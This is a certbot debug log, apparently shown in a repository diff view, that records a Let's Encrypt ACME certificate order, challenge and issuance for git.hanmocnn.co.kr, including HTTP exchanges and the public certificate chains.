2026-02-15 01:53:26,005:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjduQUJqX3hmcHhfdkM4U0huVXZmenpyUVp3Tm5GYkJ4MnhlTVZnVXZncU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDYzYTJkYTI4YjAwYjJmMjY3YTNjZDE2OTMzN2MwN2FkOWEyIn0",
"signature": "i8RhvsB81LlMh7nm_ItJXK5fXbZr8YsqP7SDnbEa30hEmK5g0n0-f7hDhua2Qv4MY80fAcQYVJpwT9YGiuVv_iDVrUY68BpwalRci79vAC0jBXaJb1sN4IOpc6fTgQnJqGX04YZqRvgcg8k5W4J31FoGqcNi8kQapst_XpZ1ylAcVDNhJD4klSlRyA2CAf43WO7Ra8V92iSoUBBMokysa83OnglG6NO6KnWTgmu9IxmnCZkQceBmsIj7U3tKdgOLxllgARu2GKgRtTOoGmDouzUeMTRXr9L_pMA5ZzT_WhknVTsOZ7Wp5dSes-o0t_z5rSF16MKfZDFM1VT-9sAlsQ",
"payload": ""
}
2026-02-15 01:53:26,183:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2 HTTP/1.1" 200 2885
2026-02-15 01:53:26,184:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:53:26 GMT
Content-Type: application/pem-certificate-chain
Content-Length: 2885
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2/1>;rel="alternate"
Replay-Nonce: qLPTsdtffEZaTjSpANFtAGOp0QEYnQLfiuY8-tbgnSfxKI78uV0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
-----BEGIN CERTIFICATE-----
MIIDoTCCAymgAwIBAgISBjotoosAsvJno80WkzfAetmiMAoGCCqGSM49BAMDMDIx
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
ODAeFw0yNjAyMTUwMDU0NTRaFw0yNjA1MTYwMDU0NTNaMB0xGzAZBgNVBAMTEmdp
dC5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABO2QHGp6d0JT
Hp2JZx0w+8v2jDULGD0Svxj22Odn6iiU7gxE2YroyYltqLl29+johBznqogYdAnh
AWrNQvuhXrZTWz/XhGRXluBAMlCaUsmPH81K289fu+BsvzTtcwgknqOCAhUwggIR
MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E
AjAAMB0GA1UdDgQWBBQjXg5iaIl+VaOsKFNBDYMgWCIYbDAfBgNVHSMEGDAWgBSP
DROi9i5+0VBsMxg4XVmOI3KRyjAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG
Fmh0dHA6Ly9lOC5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISZ2l0Lmhhbm1vY25u
LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0
dHA6Ly9lOC5jLmxlbmNyLm9yZy8zNS5jcmwwggEDBgorBgEEAdZ5AgQCBIH0BIHx
AO8AdgBJnJtp3h187Pw23s2HZKa4W68Kh4AZ0VVS++nrKd34wwAAAZxfAKdsAAAE
AwBHMEUCIQDsy9jhLjXeJoQMItYmlsDlg2dPc4bQdwlkxZ83ASW7CgIgDTYtHiyx
Ra5tMOEnPAgL3rgoGxHqUuRhL44mliLadqsAdQAOV5S8866pPjMbLJkHs/eQ35vC
PXEyJd0hqSWsYcVOIQAAAZxfAKd6AAAEAwBGMEQCIGW+1m6yYhpFaSytT2ZcvXan
J70bg4okL9UiIcHsyn5EAiA+214YOe6J72XannRc2zDN0+qcm3JqCKuGuMzyNNac
LjAKBggqhkjOPQQDAwNmADBjAjAaJFlyIY07BWGd19PrzlR9FgOMjfhIcaiK1hb4
FiCeJ11NYipDkHVMSsWacpb3cBQCL2pPIsXrhVKMMGtgG3N1uJ3t3+XycX0f8uQZ
TqpyEvrK/2BVnebJ42j/TLbZKe2F
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIEVjCCAj6gAwIBAgIQY5WTY8JOcIJxWRi/w9ftVjANBgkqhkiG9w0BAQsFADBP
MQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFy
Y2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMTAeFw0yNDAzMTMwMDAwMDBa
Fw0yNzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBF
bmNyeXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7c
S7QMApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHb
R6EToMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB
9TAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB
MBIGA1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4j
cpHKMB8GA1UdIwQYMBaAFHm0WeZ7tuXkAXOACIjIGlj26ZtuMDIGCCsGAQUFBwEB
BCYwJDAiBggrBgEFBQcwAoYWaHR0cDovL3gxLmkubGVuY3Iub3JnLzATBgNVHSAE
DDAKMAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDEuYy5sZW5j
ci5vcmcvMA0GCSqGSIb3DQEBCwUAA4ICAQBnE0hGINKsCYWi0Xx1ygxD5qihEjZ0
RI3tTZz1wuATH3ZwYPIp97kWEayanD1j0cDhIYzy4CkDo2jB8D5t0a6zZWzlr98d
AQFNh8uKJkIHdLShy+nUyeZxc5bNeMp1Lu0gSzE4McqfmNMvIpeiwWSYO9w82Ob8
otvXcO2JUYi3svHIWRm3+707DUbL51XMcY2iZdlCq4Wa9nbuk3WTU4gr6LY8MzVA
aDQG2+4U3eJ6qUF10bBnR1uuVyDYs9RhrwucRVnfuDj29CMLTsplM5f5wSV5hUpm
Uwp/vV7M4w4aGunt74koX71n4EdagCsL/Yk5+mAQU0+tue0JOfAV/R6t1k+Xk9s2
HMQFeoxppfzAVC04FdG9M+AC2JWxmFSt6BCuh3CEey3fE52Qrj9YM75rtvIjsm/1
Hl+u//Wqxnu1ZQ4jpa+VpuZiGOlWrqSP9eogdOhCGisnyewWJwRQOqK16wiGyZeR
xs/Bekw65vwSIaVkBruPiTfMOo0Zh4gVa8/qJgMbJbyrwwG97z/PRgmLKCDl8z3d
tA0Z7qq7fta0Gl24uyuB05dqI5J1LvAzKuWdIjT1tP8qCoxSE/xpix8hX2dt3h+/
jujUgFPFZ0EVZ0xSyBNRF3MboGZnYXFUxpNjTWPKpagDHJQmqrAcDmWJnMsFY3jS
u1igv3OefnWjSQ==
-----END CERTIFICATE-----
2026-02-15 01:53:26,184:DEBUG:acme.client:Storing nonce: qLPTsdtffEZaTjSpANFtAGOp0QEYnQLfiuY8-tbgnSfxKI78uV0
2026-02-15 01:53:26,185:DEBUG:acme.client:JWS payload:
b''
2026-02-15 01:53:26,189:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2/1:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZmZFWmFUalNwQU5GdEFHT3AwUUVZblFMZml1WTgtdGJnblNmeEtJNzh1VjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDYzYTJkYTI4YjAwYjJmMjY3YTNjZDE2OTMzN2MwN2FkOWEyLzEifQ",
"signature": "V4Gjh8GxzcOzTh-QYcEuKufBewF8gp3FUxRLWPCMFeDQpFcebcsIliEbqZmzr0BFuMSqVYPYvbWBFs3Dhtf9KwoKR9RQnIVpZd_Adku-kH5-ZETduBxSg8OhPZDnXM7JRo3kFSueQTRhb_wmc8t8myVsTkStPIi9QQ-9KxDK-9eTKq6oddpEwkLtfn-HcNYFGb9rUl4kemxou-p57Q7syOVYFoTxAMgqfWlqoGEkPiOPijvc21QV6heLOFL237APw6mah-TFy__FKWE2qsMnqwUt-j-0zc8jamnjEZkOBWmeLCmSm0VHrlRWH-YnZ7r-f19cfCMpZzPmc-m-gs3aTw",
"payload": ""
}
2026-02-15 01:53:26,380:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2/1 HTTP/1.1" 200 2320
2026-02-15 01:53:26,381:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:53:26 GMT
Content-Type: application/pem-certificate-chain
Content-Length: 2320
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2/0>;rel="alternate"
Replay-Nonce: qLPTsdtfwSYsFE7-JIK1dHgMxweu1kVeaqKyz4OjYM0Ebu0SZ2Q
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
-----BEGIN CERTIFICATE-----
MIIDoTCCAymgAwIBAgISBjotoosAsvJno80WkzfAetmiMAoGCCqGSM49BAMDMDIx
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
ODAeFw0yNjAyMTUwMDU0NTRaFw0yNjA1MTYwMDU0NTNaMB0xGzAZBgNVBAMTEmdp
dC5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABO2QHGp6d0JT
Hp2JZx0w+8v2jDULGD0Svxj22Odn6iiU7gxE2YroyYltqLl29+johBznqogYdAnh
AWrNQvuhXrZTWz/XhGRXluBAMlCaUsmPH81K289fu+BsvzTtcwgknqOCAhUwggIR
MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E
AjAAMB0GA1UdDgQWBBQjXg5iaIl+VaOsKFNBDYMgWCIYbDAfBgNVHSMEGDAWgBSP
DROi9i5+0VBsMxg4XVmOI3KRyjAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG
Fmh0dHA6Ly9lOC5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISZ2l0Lmhhbm1vY25u
LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0
dHA6Ly9lOC5jLmxlbmNyLm9yZy8zNS5jcmwwggEDBgorBgEEAdZ5AgQCBIH0BIHx
AO8AdgBJnJtp3h187Pw23s2HZKa4W68Kh4AZ0VVS++nrKd34wwAAAZxfAKdsAAAE
AwBHMEUCIQDsy9jhLjXeJoQMItYmlsDlg2dPc4bQdwlkxZ83ASW7CgIgDTYtHiyx
Ra5tMOEnPAgL3rgoGxHqUuRhL44mliLadqsAdQAOV5S8866pPjMbLJkHs/eQ35vC
PXEyJd0hqSWsYcVOIQAAAZxfAKd6AAAEAwBGMEQCIGW+1m6yYhpFaSytT2ZcvXan
J70bg4okL9UiIcHsyn5EAiA+214YOe6J72XannRc2zDN0+qcm3JqCKuGuMzyNNac
LjAKBggqhkjOPQQDAwNmADBjAjAaJFlyIY07BWGd19PrzlR9FgOMjfhIcaiK1hb4
FiCeJ11NYipDkHVMSsWacpb3cBQCL2pPIsXrhVKMMGtgG3N1uJ3t3+XycX0f8uQZ
TqpyEvrK/2BVnebJ42j/TLbZKe2F
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIICtTCCAjugAwIBAgIQfo8UX4exWTMtf9QIK4JraTAKBggqhkjOPQQDAzBPMQsw
CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg
R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yNDAzMTMwMDAwMDBaFw0y
NzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNy
eXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7cS7QM
ApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHbR6ET
oMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB9TAO
BgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIG
A1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4jcpHK
MB8GA1UdIwQYMBaAFHxClq7eS0g7+pL4nozPbYupcjeVMDIGCCsGAQUFBwEBBCYw
JDAiBggrBgEFBQcwAoYWaHR0cDovL3gyLmkubGVuY3Iub3JnLzATBgNVHSAEDDAK
MAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDIuYy5sZW5jci5v
cmcvMAoGCCqGSM49BAMDA2gAMGUCMQClsUNJdX36GE+o2yDf7L02m3P3ElVWRLls
5ZyLYPjcNamBxRB9gZYoj24mGZtP3GkCMASZcALg6kpScomqIIjVHXRUQ500cdl4
4n7fhxwokLo/lVlO8YyHwAi7ejTHtvw9Vg==
-----END CERTIFICATE-----
2026-02-15 01:53:26,381:DEBUG:acme.client:Storing nonce: qLPTsdtfwSYsFE7-JIK1dHgMxweu1kVeaqKyz4OjYM0Ebu0SZ2Q
2026-02-15 01:53:26,383:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager
2026-02-15 01:53:26,383:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-7.
2026-02-15 01:53:26,383:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-7.
2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-7/cert.pem.
2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-7/privkey.pem.
2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-7/chain.pem.
2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-7/fullchain.pem.
2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-7/README.
2026-02-15 01:53:26,395:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user).
2026-02-15 01:53:26,395:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user).
2026-02-15 01:53:26,395:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user).
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user).
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user).
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user).
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user).
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user).
2026-02-15 01:53:26,396:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-15 01:53:26,396:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user).
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user).
2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var webroot_map={'webroot_path'} (set by user).
2026-02-15 01:53:26,398:DEBUG:certbot._internal.display.obj:Notifying user:
Successfully received certificate.
Certificate is saved at: /etc/letsencrypt/live/npm-7/fullchain.pem
Key is saved at: /etc/letsencrypt/live/npm-7/privkey.pem
This certificate expires on 2026-05-16.
These files will be updated when the certificate renews.
2026-02-15 01:53:26,399:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS:
2026-02-15 01:53:26,399:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions.
2026-02-15 01:53:26,402:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by:
* Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate
* Donating to EFF: https://eff.org/donate-le

View File

@@ -1,608 +0,0 @@
2026-02-15 01:51:49,888:DEBUG:certbot._internal.main:certbot version: 5.3.0
2026-02-15 01:51:49,889:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot
2026-02-15 01:51:49,889:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-6', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'git.hanmocnn.co.kr']
2026-02-15 01:51:49,889:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
2026-02-15 01:51:49,906:DEBUG:certbot._internal.log:Root logging level set at 30
2026-02-15 01:51:49,907:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-15 01:51:49,907:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot
Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported).
Interfaces: Authenticator, Plugin
Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins')
Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0xffffa0e50390>
Prep: True
2026-02-15 01:51:49,908:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0xffffa0e50390> and installer None
2026-02-15 01:51:49,908:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None
2026-02-15 01:51:50,141:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=None, contact=(), agreement=None, status=None, terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service=None), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))>
2026-02-15 01:51:50,142:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory.
2026-02-15 01:51:50,147:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443
2026-02-15 01:51:50,678:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033
2026-02-15 01:51:50,679:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:51:50 GMT
Content-Type: application/json
Content-Length: 1033
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"H0mgb220UuM": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417",
"keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change",
"meta": {
"caaIdentities": [
"letsencrypt.org"
],
"profiles": {
"classic": "https://letsencrypt.org/docs/profiles#classic",
"shortlived": "https://letsencrypt.org/docs/profiles#shortlived",
"tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient",
"tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver"
},
"termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf",
"website": "https://letsencrypt.org"
},
"newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct",
"newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce",
"newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order",
"renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info",
"revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert"
}
2026-02-15 01:51:50,680:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for git.hanmocnn.co.kr
2026-02-15 01:51:50,687:DEBUG:acme.client:Requesting fresh nonce
2026-02-15 01:51:50,687:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce.
2026-02-15 01:51:50,843:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0
2026-02-15 01:51:50,844:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:51:50 GMT
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: NeKnt8TGdBzHxUclyNbZW9s3_Zgksoml2Lq4pfk94QLSB9SdukQ
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
2026-02-15 01:51:50,844:DEBUG:acme.client:Storing nonce: NeKnt8TGdBzHxUclyNbZW9s3_Zgksoml2Lq4pfk94QLSB9SdukQ
2026-02-15 01:51:50,844:DEBUG:acme.client:JWS payload:
b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "git.hanmocnn.co.kr"\n }\n ]\n}'
2026-02-15 01:51:50,850:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2RCekh4VWNseU5iWlc5czNfWmdrc29tbDJMcTRwZms5NFFMU0I5U2R1a1EiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9",
"signature": "qAt8eXKNxxIDV6XMGdk18fBntRW7vcOUV0PZTTDSghKJeeenaQzg4Qz1BDHYaPfkAmEZ6z-TtzeTZvewo3COOxe6qqUOeSOKsWs2GP6SIBSqWoGem8DFRpqk3FVk0vmXIoiupF3plySfrpK5C0gbOGya5OtDDC3nY1UYnFC9aYefhHWqUL61zmQHSA_XCukwwgPP8PgOQ3Cbyi7KSaLAVjp27VKmxGCt6IqmlkZi1VpT8nxXfYpMwQ-VQKDwnSgG7FtjwgSZnJCd2IIJnM3kkaIv-FO51nivhU1pUcxXvk_pnZtLv86_O65fmTLhFlTASOKiaDnoffI-FhZE0KOTvg",
"payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImdpdC5oYW5tb2Nubi5jby5rciIKICAgIH0KICBdCn0"
}
2026-02-15 01:51:51,040:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 352
2026-02-15 01:51:51,040:DEBUG:acme.client:Received response:
HTTP 201
Server: nginx
Date: Sun, 15 Feb 2026 01:51:50 GMT
Content-Type: application/json
Content-Length: 352
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480408820986
Replay-Nonce: NeKnt8TGHmpTiA8eUyeODagzdJZLQFsIFH4bWqSCTp34fwUNaU4
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "pending",
"expires": "2026-02-22T01:51:50Z",
"identifiers": [
{
"type": "dns",
"value": "git.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480408820986"
}
2026-02-15 01:51:51,040:DEBUG:acme.client:Storing nonce: NeKnt8TGHmpTiA8eUyeODagzdJZLQFsIFH4bWqSCTp34fwUNaU4
2026-02-15 01:51:51,041:DEBUG:acme.client:JWS payload:
b''
2026-02-15 01:51:51,045:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0htcFRpQThlVXllT0RhZ3pkSlpMUUZzSUZINGJXcVNDVHAzNGZ3VU5hVTQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0",
"signature": "xD5_zw4XMvY1xlo89Kw8bnTshAIEzOReJhnmZtVJoDWODLY0tZyeNLnS5As4aNG3urUYk_2V-DdHxWa3KVqNnUoWiU3zEk4NYrAfc12VEIdJpn3XhrTtgrM7t1qhXO8RjIt_9QwR1jjmp7moDIIFHsUw-pDmzGGQTh619IhVl7aPb--Szq0F-EmOD1r1T9bD3YgrKLSw47qPwytNmwnshzT8p-c9oGrU577S5DN2Wqorzbx0BSW_--DAoc2kVkdkrKs-nNrfSaY07bxQGDQXQNnSdYgyiIJKu1F-wB22KUBes5ms6o8k1FqOLXyNgymzjUcuZ0hfYe3sZ6E4TlHrWQ",
"payload": ""
}
2026-02-15 01:51:51,203:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 826
2026-02-15 01:51:51,204:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:51:51 GMT
Content-Type: application/json
Content-Length: 826
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: 4AH-2vvBn0w9qfwZhLqSAyLL6pOKIlFnF7FvghSQeN3TK7jb0WM
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "git.hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-22T01:51:50Z",
"challenges": [
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ",
"status": "pending",
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/muacBg",
"status": "pending",
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
},
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ",
"status": "pending",
"token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0"
}
]
}
2026-02-15 01:51:51,204:DEBUG:acme.client:Storing nonce: 4AH-2vvBn0w9qfwZhLqSAyLL6pOKIlFnF7FvghSQeN3TK7jb0WM
2026-02-15 01:51:51,205:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ', 'status': 'pending', 'token': 'lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0'}
2026-02-15 01:51:51,205:INFO:certbot._internal.auth_handler:Performing the following challenges:
2026-02-15 01:51:51,205:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='git.hanmocnn.co.kr')
2026-02-15 01:51:51,206:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains.
